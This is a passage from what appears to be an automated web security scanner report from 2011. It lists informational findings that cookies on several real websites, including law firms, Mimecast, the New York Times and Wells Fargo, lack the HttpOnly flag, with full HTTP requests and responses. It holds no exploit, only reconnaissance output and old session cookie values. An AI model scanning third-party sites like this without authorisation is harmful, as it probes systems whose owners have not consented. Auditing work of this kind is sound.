Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Date: Thu, 12 May 2011 12:19:05 GMT
Set-Cookie: NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180d45525d5f4f58455e445a4a423660;path=/
Content-Length: 58767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Benesc
...[SNIP]...

14.144. http://www.beneschlaw.com/FCWSite/Include/spamproof.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beneschlaw.com
Path:   /FCWSite/Include/spamproof.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/Include/spamproof.aspx HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.beneschlaw.com/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1115; PortletId=6201; SiteId=1086; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=4pdcdw555vegmp55inbs05nz; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=Web; ZoneId=7; NSC_QPE-FHB7374_TibsfQspe=ffffffff09df180c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 1203
Content-Type: text/javascript; charset=us-ascii
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A74
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: ZoneId=0; path=/
Date: Thu, 12 May 2011 12:19:06 GMT
Content-Length: 1203

function SendMail(n,d){ document.location.href='mailto:' + n + '@' + d;}

function PrintMail(n,d,m){
   PrintMail(n,d,m,'');
}    

function PrintMail(n,d,m,l){
   var ns = n.replace("'","\\\'");
...[SNIP]...

14.145. http://www.csscorp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:11 GMT
Server: Apache/2.2.12 (Unix)
Set-Cookie: csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Global Information &
...[SNIP]...

14.146. http://www.digiware.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digiware.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: f165d946d0a4013e03ebd5d7edb21d2c=bqhecm8n2rb4cadkusa5gg38q1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19619


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...

14.147. http://www.gobignetwork.com/funding

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gobignetwork.com
Path:   /funding

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /funding HTTP/1.1
Host: www.gobignetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM; expires=Sun, 06-May-2012 11:01:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:18 GMT
Content-Length: 56329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...

14.148. http://www.mimecast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:49 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:49 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 61607

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Mimecast Email Management | Unified Email Management Solutions</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast
...[SNIP]...

14.149. http://www.mimecast.com/About-us/Contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /About-us/Contact-us/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /About-us/Contact-us/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=lceka2nmzsc44jouj2at51w5; MimecastcomTracker=id=1762891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:48 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:48 GMT; path=/
Date: Thu, 12 May 2011 12:37:48 GMT
Content-Length: 106303

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Contact Mimecast | Product Inquiry | Demo Request</title>
<META NAME="DESCRIPTION" CONTENT="If you have an i
...[SNIP]...

14.150. http://www.mimecast.com/What-we-offer/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mimecast.com
Path:   /What-we-offer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /What-we-offer/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:37:50 GMT
Vary: Accept-Encoding
Set-Cookie: MimecastcomRegion=North America; expires=Fri, 11-May-2012 12:37:50 GMT; path=/
Date: Thu, 12 May 2011 12:37:50 GMT
Content-Length: 66702

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_Head1"><meta charset="utf-8" /><title>Email Management & Email Compliance Solutions and more</title>
<META NAME="DESCRIPTION" CONTENT="Mimecast offers e
...[SNIP]...

14.151. http://www.moritthock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_visit=989860894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_last_activity=1305220894; expires=Fri, 11-May-2012 12:21:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:34 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...

14.152. http://www.moritthock.com/index.php/representative_transactions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/representative_transactions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/representative_transactions HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=989860893; exp_last_activity=1305220893; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmb=175020734.1.10.1305202900; __utmc=175020734; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:30:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305221434; expires=Fri, 11-May-2012 12:30:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:30:35 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39384


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Representative Transactions
...[SNIP]...

14.153. http://www.moritthock.com/index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/representative_transactions/transaction/counseling_developers_of_luxury_housing_in_nyc HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/representative_transactions
Cookie: exp_last_visit=989860893; exp_last_activity=1305221430; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmb=175020734.2.10.1305202900; __utmc=175020734; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:31:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305221466; expires=Fri, 11-May-2012 12:31:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A88%3A%22%2Frepresentative_transactions%2Ftransaction%2Fcounseling_developers_of_luxury_housing_in_nyc%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Frepresentative_transactions%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:31:06 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 12752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Manhattan Real Estate Law |
...[SNIP]...

14.154. http://www.nytimes.com/adx/bin/adx_remote.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /adx/bin/adx_remote.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/post&posall=XXL,TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Frame6A,Left2,Left3,Left4,Left5,Left6,Left7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Mergers+&+Acquisitions;Investment+Banking;I+PO;I.P.O.s;IPOs;Offerings;Private+Equity;Hedge+Funds;Venture+Capital;Legal;The+New+York+Times;Andrew+Ross+Sorkin;Andrew+Sorkin;+DealBook;deal+maker;Wall+street;wall+st.;Goldman+Sachs;Goldman+Sachs+Group;Morgan+Stanley;Morgan+Stanley+Smith+Barney;Citigroup;Citibank;Citi;Citicorp;Bank+of+America;Bank+of+America+Merrill+Lynch;Merrill+Lynch;Merrill;JPMorgan+Chase;J.P.+Morgan+Chase;J.+P.+Morgan+Chase;J.P.+Morgan+Securities;Bear+Stearns;Lehman+Brothers;Credit+Suisse;Credit+Suisse+First+Boston;CSFB;UBS;Deutsche+Bank;SAC+Capital;S.A.C.+Capital;Stevie+Cohen;Henry+Kravis;KKR;Kohlberg+Kravis+Roberts;Stephen+Schwarzman;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;animal-kingdom;boston-celtics;carl-pascarella;churchill-downs;david-bonderman;detroit-pistons;kentucky-derby;new-york-mets-org;platinum-equity;private-equity;retailleisure;steven-a-cohen;team-valor-international;tom-gores;tpgtexas-pacific-group HTTP/1.1
Host: www.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; ebNewBandWidth_.www.nytimes.com=2534%3A1304378197383; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; _chartbeat2=sb4nmgc9whf8empd

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-type: text/html
Set-cookie: adxcl=t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:03:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*192f7=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 22704


var adxads = new Array(11);

adxads[0] = "<img src=\"http://graphics8.nytimes.com/ads/blank.gif\">";
adxpos_Bottom7 = 0;

adxads[1] = "<script> function safeMultiTrack() { if ('dcsMultiTrack' in wind
...[SNIP]...

14.155. http://www.porterwright.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1160; path=/
Set-Cookie: PortletId=50001; path=/
Set-Cookie: SiteId=1111; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=khxniv2bhbjl4s55zz4g20eb; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 21792
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/
Content-Length: 21792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta name="descri
...[SNIP]...

14.156. http://www.porterwright.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.porterwright.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1160; PortletId=50001; SiteId=1111; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=smrnyb45jqc30onlx2jz0z45; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1097&RootPortletID=676&RootPortletH4AssetID=383&LicenseKey= &Name=Web Framework&URL=websites; ZoneId=7; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=221978393.1924349939.1305202915.1305202915.1305202915.1; __utmb=221978393.1.10.1305202915; __utmc=221978393; __utmz=221978393.1305202915.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Porter%20Wright%20Morris%20%26%20Arthur

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:22:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc:02
x-client:000896
x-apptype:01
x-prodtype:01
x-public:1
x-redirect:0
x-occurrence:01
x-server:EG-HUBRD-A67
X-UA-Compatible:IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 462
Content-Length: 462


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

14.157. https://www.wellsfargo.com/jump/theprivatebank/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /jump/theprivatebank/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jump/theprivatebank/index HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:07:47 GMT
Content-length: 8767
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: v1st=860BCE3A6686392; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
